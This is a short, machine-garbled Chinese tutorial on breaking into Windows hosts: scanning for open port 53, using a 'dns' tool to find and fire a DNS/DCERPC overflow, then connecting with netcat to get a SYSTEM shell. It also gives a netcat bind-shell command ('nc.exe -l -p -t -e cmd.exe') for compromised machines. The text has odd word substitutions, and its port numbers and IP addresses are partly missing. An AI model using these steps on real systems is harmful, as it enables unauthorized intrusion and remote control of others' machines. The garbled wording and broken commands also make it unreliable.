条件是必须要开放53、端口 1、选择superscan举行扫描,在端口列表中勾选上53、端口,然后选择主机段举行扫描. 2、选择存在53、端口的主机,在cmd下输入dns -t ip对主机举行特定破绽端口扫描," :Vulnerability"示意 端口存在溢出破绽,"os:window "示意系统类型为window . 3、在执行dns -t all ip 对目的主机举行溢出.connection to target host tcp port established 乐成毗邻到主机的tcp端口上, successfully bound to the vulnerale dcerpc interface 已经毗邻到对方的rpc端口上,os fingerprint result:windows 系统指纹判定对方是wind系统,attack sent,check port 攻击代码已经乐成发送,并实验毗邻端口.当泛起最后这一句提醒语句的时刻就意味着我们要乐成了. 4、怎么毗邻对方的端口呢,固然我们要使用nc了. 5、nc全称叫"netcat",这是一个异常简朴易用的基于tcp/ip协议(c/s模子的)的"瑞士军刀". 下面先容一下它的几个常用功效 1、nc.exe -vv -l -p ,示意在内陆端口上举行监听.-vv:显示详细的信息.-l:举行监听,监听入站信息.-p:监听所使用的端口号. 2、正如我们遇到的情形,对方已经开放了一个端口.他在守候我们毗邻哦,毗邻上去会有什么呢?固然是system权限的shell了.nc.exe -vv .0.0.1 ,毗邻ip为.0.0.1的端口. 3、还可以在内陆监听端口的同时绑定shell,就相当于一个telnet服务端.通常这个下令在肉鸡上执行,然后当我们毗邻上去就可以获得这个shell了.nc.exe -l -p -t -e cmd.exe,在本机端口上监听并绑定cmd.exe.-e 作用就是程序定向.-t以telnet的形式来应答. 4、它可以用来手动对主机提交数据包(通常为80)端口,nc.exe -vv .0.0.1 80 ,往ip为.0.0.1的80端口提交yan.txt中的内容.>